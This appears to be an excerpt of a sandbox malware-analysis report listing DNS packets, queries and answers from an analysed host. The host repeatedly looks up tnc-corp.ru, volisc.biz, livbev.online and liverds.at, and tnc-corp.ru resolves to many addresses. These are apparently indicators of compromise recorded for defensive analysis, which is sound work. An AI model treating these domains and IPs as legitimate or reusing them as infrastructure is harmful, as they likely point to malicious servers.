                                            Oct 20, 2024 09:39:33.099148035 CEST5304053192.168.2.41.1.1.1
                                            Oct 20, 2024 09:39:34.087735891 CEST5304053192.168.2.41.1.1.1
                                            Oct 20, 2024 09:39:35.103343964 CEST5304053192.168.2.41.1.1.1
                                            Oct 20, 2024 09:39:37.118973970 CEST5304053192.168.2.41.1.1.1
                                            Oct 20, 2024 09:39:41.121043921 CEST5304053192.168.2.41.1.1.1
                                            Oct 20, 2024 09:39:42.128823996 CEST53530401.1.1.1192.168.2.4
                                            Oct 20, 2024 09:39:42.128842115 CEST53530401.1.1.1192.168.2.4
                                            Oct 20, 2024 09:39:42.128850937 CEST53530401.1.1.1192.168.2.4
                                            Oct 20, 2024 09:39:42.128863096 CEST53530401.1.1.1192.168.2.4
                                            Oct 20, 2024 09:39:42.128931046 CEST53530401.1.1.1192.168.2.4
                                            Oct 20, 2024 09:39:42.144233942 CEST5119353192.168.2.41.1.1.1
                                            Oct 20, 2024 09:39:42.153511047 CEST53511931.1.1.1192.168.2.4
                                            Oct 20, 2024 09:39:42.158812046 CEST6252953192.168.2.41.1.1.1
                                            Oct 20, 2024 09:39:43.166395903 CEST6252953192.168.2.41.1.1.1
                                            Oct 20, 2024 09:39:44.170075893 CEST6252953192.168.2.41.1.1.1
                                            Oct 20, 2024 09:39:46.166450024 CEST6252953192.168.2.41.1.1.1
                                            Oct 20, 2024 09:39:50.182689905 CEST6252953192.168.2.41.1.1.1
                                            Oct 20, 2024 09:39:51.006125927 CEST53625291.1.1.1192.168.2.4
                                            Oct 20, 2024 09:39:51.006141901 CEST53625291.1.1.1192.168.2.4
                                            Oct 20, 2024 09:39:51.006150961 CEST53625291.1.1.1192.168.2.4
                                            Oct 20, 2024 09:39:51.006161928 CEST53625291.1.1.1192.168.2.4
                                            Oct 20, 2024 09:39:51.006165981 CEST53625291.1.1.1192.168.2.4
                                            Oct 20, 2024 09:39:57.297740936 CEST5229653192.168.2.41.1.1.1
                                            Oct 20, 2024 09:39:58.291162968 CEST5229653192.168.2.41.1.1.1
                                            Oct 20, 2024 09:39:59.306598902 CEST5229653192.168.2.41.1.1.1
                                            Oct 20, 2024 09:40:01.306811094 CEST5229653192.168.2.41.1.1.1
                                            Oct 20, 2024 09:40:05.261745930 CEST53522961.1.1.1192.168.2.4
                                            Oct 20, 2024 09:40:05.261797905 CEST53522961.1.1.1192.168.2.4
                                            Oct 20, 2024 09:40:05.261809111 CEST53522961.1.1.1192.168.2.4
                                            Oct 20, 2024 09:40:05.261816978 CEST53522961.1.1.1192.168.2.4
                                            Oct 20, 2024 09:40:05.276205063 CEST5058653192.168.2.41.1.1.1
                                            Oct 20, 2024 09:40:05.288279057 CEST53505861.1.1.1192.168.2.4
                                            Oct 20, 2024 09:40:05.302545071 CEST6255053192.168.2.41.1.1.1
                                            Oct 20, 2024 09:40:06.290985107 CEST6255053192.168.2.41.1.1.1
                                            Oct 20, 2024 09:40:07.290999889 CEST6255053192.168.2.41.1.1.1
                                            Oct 20, 2024 09:40:07.298880100 CEST53625501.1.1.1192.168.2.4
                                            Oct 20, 2024 09:40:13.759941101 CEST53625501.1.1.1192.168.2.4
                                            Oct 20, 2024 09:40:13.759958029 CEST53625501.1.1.1192.168.2.4
                                            Oct 20, 2024 09:40:22.245542049 CEST5666053192.168.2.41.1.1.1
                                            Oct 20, 2024 09:40:23.259813070 CEST5666053192.168.2.41.1.1.1
                                            Oct 20, 2024 09:40:24.259974957 CEST5666053192.168.2.41.1.1.1
                                            Oct 20, 2024 09:40:26.259892941 CEST5666053192.168.2.41.1.1.1
                                            Oct 20, 2024 09:40:29.140971899 CEST53566601.1.1.1192.168.2.4
                                            Oct 20, 2024 09:40:29.140989065 CEST53566601.1.1.1192.168.2.4
                                            Oct 20, 2024 09:40:29.140997887 CEST53566601.1.1.1192.168.2.4
                                            Oct 20, 2024 09:40:29.141005993 CEST53566601.1.1.1192.168.2.4
                                            Oct 20, 2024 09:40:29.145399094 CEST5603353192.168.2.41.1.1.1
                                            Oct 20, 2024 09:40:29.154721022 CEST53560331.1.1.1192.168.2.4
                                            Oct 20, 2024 09:40:29.157561064 CEST6529253192.168.2.41.1.1.1
                                            Oct 20, 2024 09:40:30.169682980 CEST6529253192.168.2.41.1.1.1
                                            Oct 20, 2024 09:40:31.182416916 CEST6529253192.168.2.41.1.1.1
                                            Oct 20, 2024 09:40:33.184174061 CEST6529253192.168.2.41.1.1.1
                                            Oct 20, 2024 09:40:37.204145908 CEST6529253192.168.2.41.1.1.1
                                            Oct 20, 2024 09:40:37.993104935 CEST53652921.1.1.1192.168.2.4
                                            Oct 20, 2024 09:40:37.993119955 CEST53652921.1.1.1192.168.2.4
                                            Oct 20, 2024 09:40:37.993127108 CEST53652921.1.1.1192.168.2.4
                                            Oct 20, 2024 09:40:37.993135929 CEST53652921.1.1.1192.168.2.4
                                            Oct 20, 2024 09:40:37.993146896 CEST53652921.1.1.1192.168.2.4
                                            Oct 20, 2024 09:40:43.115511894 CEST5464653192.168.2.41.1.1.1
                                            Oct 20, 2024 09:40:44.123583078 CEST5464653192.168.2.41.1.1.1
                                            Oct 20, 2024 09:40:45.124490023 CEST5464653192.168.2.41.1.1.1
                                            Oct 20, 2024 09:40:47.123059034 CEST5464653192.168.2.41.1.1.1
                                            Oct 20, 2024 09:40:51.032890081 CEST53546461.1.1.1192.168.2.4
                                            Oct 20, 2024 09:40:51.032912016 CEST53546461.1.1.1192.168.2.4
                                            Oct 20, 2024 09:40:51.032924891 CEST53546461.1.1.1192.168.2.4
                                            Oct 20, 2024 09:40:51.032937050 CEST53546461.1.1.1192.168.2.4
                                            Oct 20, 2024 09:40:51.044414043 CEST5266353192.168.2.41.1.1.1
                                            Oct 20, 2024 09:40:51.053415060 CEST53526631.1.1.1192.168.2.4
                                            Oct 20, 2024 09:40:51.059890032 CEST5840553192.168.2.41.1.1.1
                                            Oct 20, 2024 09:40:52.072747946 CEST5840553192.168.2.41.1.1.1
                                            Oct 20, 2024 09:40:53.074752092 CEST5840553192.168.2.41.1.1.1
                                            Oct 20, 2024 09:40:55.094579935 CEST5840553192.168.2.41.1.1.1
                                            Oct 20, 2024 09:40:59.089540958 CEST5840553192.168.2.41.1.1.1
                                            Oct 20, 2024 09:40:59.940843105 CEST53584051.1.1.1192.168.2.4
                                            Oct 20, 2024 09:40:59.940856934 CEST53584051.1.1.1192.168.2.4
                                            Oct 20, 2024 09:40:59.940874100 CEST53584051.1.1.1192.168.2.4
                                            Oct 20, 2024 09:40:59.940882921 CEST53584051.1.1.1192.168.2.4
                                            Oct 20, 2024 09:40:59.940891027 CEST53584051.1.1.1192.168.2.4

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Oct 20, 2024 09:37:23.464411974 CEST192.168.2.41.1.1.10x4ff0Standard query (0)tnc-corp.ruA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:37:24.477906942 CEST192.168.2.41.1.1.10x4ff0Standard query (0)tnc-corp.ruA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:37:25.493490934 CEST192.168.2.41.1.1.10x4ff0Standard query (0)tnc-corp.ruA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:37:27.508902073 CEST192.168.2.41.1.1.10x4ff0Standard query (0)tnc-corp.ruA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:37:27.705244064 CEST192.168.2.41.1.1.10x32c7Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:37:28.712131023 CEST192.168.2.41.1.1.10x32c7Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:37:29.712110996 CEST192.168.2.41.1.1.10x32c7Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:37:31.727678061 CEST192.168.2.41.1.1.10x32c7Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:37:35.727746964 CEST192.168.2.41.1.1.10x32c7Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:37:37.217175007 CEST192.168.2.41.1.1.10xc841Standard query (0)livbev.onlineA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:37:37.228619099 CEST192.168.2.41.1.1.10x4471Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:37:38.227806091 CEST192.168.2.41.1.1.10x4471Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:38:51.331573009 CEST192.168.2.41.1.1.10x995bStandard query (0)tnc-corp.ruA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:38:52.337474108 CEST192.168.2.41.1.1.10x995bStandard query (0)tnc-corp.ruA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:38:53.337481976 CEST192.168.2.41.1.1.10x995bStandard query (0)tnc-corp.ruA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:38:55.068178892 CEST192.168.2.41.1.1.10x165cStandard query (0)volisc.bizA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:38:56.071932077 CEST192.168.2.41.1.1.10x165cStandard query (0)volisc.bizA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:38:57.081801891 CEST192.168.2.41.1.1.10x165cStandard query (0)volisc.bizA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:38:59.087507010 CEST192.168.2.41.1.1.10x165cStandard query (0)volisc.bizA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:02.972198963 CEST192.168.2.41.1.1.10x3880Standard query (0)livbev.onlineA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:02.985948086 CEST192.168.2.41.1.1.10x8207Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:03.994590998 CEST192.168.2.41.1.1.10x8207Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:05.008824110 CEST192.168.2.41.1.1.10x8207Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:07.000643969 CEST192.168.2.41.1.1.10x8207Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:16.004688978 CEST192.168.2.41.1.1.10xacdStandard query (0)volisc.bizA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:17.009521961 CEST192.168.2.41.1.1.10xacdStandard query (0)volisc.bizA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:18.009525061 CEST192.168.2.41.1.1.10xacdStandard query (0)volisc.bizA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:20.009536982 CEST192.168.2.41.1.1.10xacdStandard query (0)volisc.bizA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:20.864247084 CEST192.168.2.41.1.1.10x91a6Standard query (0)livbev.onlineA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:20.882436991 CEST192.168.2.41.1.1.10xeccfStandard query (0)liverds.atA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:21.874319077 CEST192.168.2.41.1.1.10xeccfStandard query (0)liverds.atA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:22.891041994 CEST192.168.2.41.1.1.10xeccfStandard query (0)liverds.atA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:24.885687113 CEST192.168.2.41.1.1.10xeccfStandard query (0)liverds.atA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:33.099148035 CEST192.168.2.41.1.1.10xae7cStandard query (0)volisc.bizA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:34.087735891 CEST192.168.2.41.1.1.10xae7cStandard query (0)volisc.bizA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:35.103343964 CEST192.168.2.41.1.1.10xae7cStandard query (0)volisc.bizA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:37.118973970 CEST192.168.2.41.1.1.10xae7cStandard query (0)volisc.bizA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:41.121043921 CEST192.168.2.41.1.1.10xae7cStandard query (0)volisc.bizA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:42.144233942 CEST192.168.2.41.1.1.10x605bStandard query (0)livbev.onlineA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:42.158812046 CEST192.168.2.41.1.1.10x1106Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:43.166395903 CEST192.168.2.41.1.1.10x1106Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:44.170075893 CEST192.168.2.41.1.1.10x1106Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:46.166450024 CEST192.168.2.41.1.1.10x1106Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:50.182689905 CEST192.168.2.41.1.1.10x1106Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:57.297740936 CEST192.168.2.41.1.1.10x360Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:58.291162968 CEST192.168.2.41.1.1.10x360Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:59.306598902 CEST192.168.2.41.1.1.10x360Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:01.306811094 CEST192.168.2.41.1.1.10x360Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:05.276205063 CEST192.168.2.41.1.1.10x93ddStandard query (0)livbev.onlineA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:05.302545071 CEST192.168.2.41.1.1.10xffbeStandard query (0)liverds.atA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:06.290985107 CEST192.168.2.41.1.1.10xffbeStandard query (0)liverds.atA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:07.290999889 CEST192.168.2.41.1.1.10xffbeStandard query (0)liverds.atA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:22.245542049 CEST192.168.2.41.1.1.10x898bStandard query (0)volisc.bizA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:23.259813070 CEST192.168.2.41.1.1.10x898bStandard query (0)volisc.bizA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:24.259974957 CEST192.168.2.41.1.1.10x898bStandard query (0)volisc.bizA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:26.259892941 CEST192.168.2.41.1.1.10x898bStandard query (0)volisc.bizA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:29.145399094 CEST192.168.2.41.1.1.10x4a84Standard query (0)livbev.onlineA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:29.157561064 CEST192.168.2.41.1.1.10x263Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:30.169682980 CEST192.168.2.41.1.1.10x263Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:31.182416916 CEST192.168.2.41.1.1.10x263Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:33.184174061 CEST192.168.2.41.1.1.10x263Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:37.204145908 CEST192.168.2.41.1.1.10x263Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:43.115511894 CEST192.168.2.41.1.1.10x2d67Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:44.123583078 CEST192.168.2.41.1.1.10x2d67Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:45.124490023 CEST192.168.2.41.1.1.10x2d67Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:47.123059034 CEST192.168.2.41.1.1.10x2d67Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:51.044414043 CEST192.168.2.41.1.1.10xcd97Standard query (0)livbev.onlineA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:51.059890032 CEST192.168.2.41.1.1.10x3f1cStandard query (0)liverds.atA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:52.072747946 CEST192.168.2.41.1.1.10x3f1cStandard query (0)liverds.atA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:53.074752092 CEST192.168.2.41.1.1.10x3f1cStandard query (0)liverds.atA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:55.094579935 CEST192.168.2.41.1.1.10x3f1cStandard query (0)liverds.atA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:59.089540958 CEST192.168.2.41.1.1.10x3f1cStandard query (0)liverds.atA (IP address)IN (0x0001)false

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Oct 20, 2024 09:37:27.701919079 CEST1.1.1.1192.168.2.40x4ff0Server failure (2)tnc-corp.runonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:37:27.701935053 CEST1.1.1.1192.168.2.40x4ff0Server failure (2)tnc-corp.runonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:37:27.701941013 CEST1.1.1.1192.168.2.40x4ff0Server failure (2)tnc-corp.runonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:37:27.701946020 CEST1.1.1.1192.168.2.40x4ff0Server failure (2)tnc-corp.runonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:37:37.214426041 CEST1.1.1.1192.168.2.40x32c7Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:37:37.214464903 CEST1.1.1.1192.168.2.40x32c7Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:37:37.214497089 CEST1.1.1.1192.168.2.40x32c7Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:37:37.214525938 CEST1.1.1.1192.168.2.40x32c7Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:37:37.214561939 CEST1.1.1.1192.168.2.40x32c7Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:37:37.226423025 CEST1.1.1.1192.168.2.40xc841Name error (3)livbev.onlinenonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:37:45.312041044 CEST1.1.1.1192.168.2.40x4471Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:38:53.862907887 CEST1.1.1.1192.168.2.40x995bNo error (0)tnc-corp.ru211.171.233.126A (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:38:53.862907887 CEST1.1.1.1192.168.2.40x995bNo error (0)tnc-corp.ru189.195.132.134A (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:38:53.862907887 CEST1.1.1.1192.168.2.40x995bNo error (0)tnc-corp.ru190.249.249.14A (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:38:53.862907887 CEST1.1.1.1192.168.2.40x995bNo error (0)tnc-corp.ru181.123.219.23A (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:38:53.862907887 CEST1.1.1.1192.168.2.40x995bNo error (0)tnc-corp.ru190.224.203.37A (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:38:53.862907887 CEST1.1.1.1192.168.2.40x995bNo error (0)tnc-corp.ru201.191.99.134A (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:38:53.862907887 CEST1.1.1.1192.168.2.40x995bNo error (0)tnc-corp.ru211.202.224.10A (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:38:53.862907887 CEST1.1.1.1192.168.2.40x995bNo error (0)tnc-corp.ru187.156.6.228A (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:38:53.862907887 CEST1.1.1.1192.168.2.40x995bNo error (0)tnc-corp.ru197.164.156.210A (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:38:53.862907887 CEST1.1.1.1192.168.2.40x995bNo error (0)tnc-corp.ru125.7.253.10A (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:38:53.862921953 CEST1.1.1.1192.168.2.40x995bNo error (0)tnc-corp.ru211.171.233.126A (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:38:53.862921953 CEST1.1.1.1192.168.2.40x995bNo error (0)tnc-corp.ru189.195.132.134A (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:38:53.862921953 CEST1.1.1.1192.168.2.40x995bNo error (0)tnc-corp.ru190.249.249.14A (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:38:53.862921953 CEST1.1.1.1192.168.2.40x995bNo error (0)tnc-corp.ru181.123.219.23A (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:38:53.862921953 CEST1.1.1.1192.168.2.40x995bNo error (0)tnc-corp.ru190.224.203.37A (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:38:53.862921953 CEST1.1.1.1192.168.2.40x995bNo error (0)tnc-corp.ru201.191.99.134A (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:38:53.862921953 CEST1.1.1.1192.168.2.40x995bNo error (0)tnc-corp.ru211.202.224.10A (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:38:53.862921953 CEST1.1.1.1192.168.2.40x995bNo error (0)tnc-corp.ru187.156.6.228A (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:38:53.862921953 CEST1.1.1.1192.168.2.40x995bNo error (0)tnc-corp.ru197.164.156.210A (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:38:53.862921953 CEST1.1.1.1192.168.2.40x995bNo error (0)tnc-corp.ru125.7.253.10A (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:38:53.862989902 CEST1.1.1.1192.168.2.40x995bNo error (0)tnc-corp.ru211.171.233.126A (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:38:53.862989902 CEST1.1.1.1192.168.2.40x995bNo error (0)tnc-corp.ru189.195.132.134A (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:38:53.862989902 CEST1.1.1.1192.168.2.40x995bNo error (0)tnc-corp.ru190.249.249.14A (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:38:53.862989902 CEST1.1.1.1192.168.2.40x995bNo error (0)tnc-corp.ru181.123.219.23A (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:38:53.862989902 CEST1.1.1.1192.168.2.40x995bNo error (0)tnc-corp.ru190.224.203.37A (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:38:53.862989902 CEST1.1.1.1192.168.2.40x995bNo error (0)tnc-corp.ru201.191.99.134A (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:38:53.862989902 CEST1.1.1.1192.168.2.40x995bNo error (0)tnc-corp.ru211.202.224.10A (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:38:53.862989902 CEST1.1.1.1192.168.2.40x995bNo error (0)tnc-corp.ru187.156.6.228A (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:38:53.862989902 CEST1.1.1.1192.168.2.40x995bNo error (0)tnc-corp.ru197.164.156.210A (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:38:53.862989902 CEST1.1.1.1192.168.2.40x995bNo error (0)tnc-corp.ru125.7.253.10A (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:02.967356920 CEST1.1.1.1192.168.2.40x165cServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:02.967367887 CEST1.1.1.1192.168.2.40x165cServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:02.967375994 CEST1.1.1.1192.168.2.40x165cServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:02.967389107 CEST1.1.1.1192.168.2.40x165cServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:02.981376886 CEST1.1.1.1192.168.2.40x3880Name error (3)livbev.onlinenonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:10.781418085 CEST1.1.1.1192.168.2.40x8207Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:10.781434059 CEST1.1.1.1192.168.2.40x8207Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:10.781441927 CEST1.1.1.1192.168.2.40x8207Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:10.781451941 CEST1.1.1.1192.168.2.40x8207Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:20.848484993 CEST1.1.1.1192.168.2.40xacdServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:20.848506927 CEST1.1.1.1192.168.2.40xacdServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:20.848520041 CEST1.1.1.1192.168.2.40xacdServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:20.848531961 CEST1.1.1.1192.168.2.40xacdServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:20.873393059 CEST1.1.1.1192.168.2.40x91a6Name error (3)livbev.onlinenonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:27.918654919 CEST1.1.1.1192.168.2.40xeccfServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:27.918673038 CEST1.1.1.1192.168.2.40xeccfServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:27.918683052 CEST1.1.1.1192.168.2.40xeccfServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:27.918694019 CEST1.1.1.1192.168.2.40xeccfServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:42.128823996 CEST1.1.1.1192.168.2.40xae7cServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:42.128842115 CEST1.1.1.1192.168.2.40xae7cServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:42.128850937 CEST1.1.1.1192.168.2.40xae7cServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:42.128863096 CEST1.1.1.1192.168.2.40xae7cServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:42.128931046 CEST1.1.1.1192.168.2.40xae7cServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:42.153511047 CEST1.1.1.1192.168.2.40x605bName error (3)livbev.onlinenonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:51.006125927 CEST1.1.1.1192.168.2.40x1106Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:51.006141901 CEST1.1.1.1192.168.2.40x1106Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:51.006150961 CEST1.1.1.1192.168.2.40x1106Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:51.006161928 CEST1.1.1.1192.168.2.40x1106Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:51.006165981 CEST1.1.1.1192.168.2.40x1106Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:05.261745930 CEST1.1.1.1192.168.2.40x360Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:05.261797905 CEST1.1.1.1192.168.2.40x360Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:05.261809111 CEST1.1.1.1192.168.2.40x360Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:05.261816978 CEST1.1.1.1192.168.2.40x360Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:05.288279057 CEST1.1.1.1192.168.2.40x93ddName error (3)livbev.onlinenonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:13.759941101 CEST1.1.1.1192.168.2.40xffbeServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:13.759958029 CEST1.1.1.1192.168.2.40xffbeServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:29.140971899 CEST1.1.1.1192.168.2.40x898bServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:29.140989065 CEST1.1.1.1192.168.2.40x898bServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:29.140997887 CEST1.1.1.1192.168.2.40x898bServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:29.141005993 CEST1.1.1.1192.168.2.40x898bServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
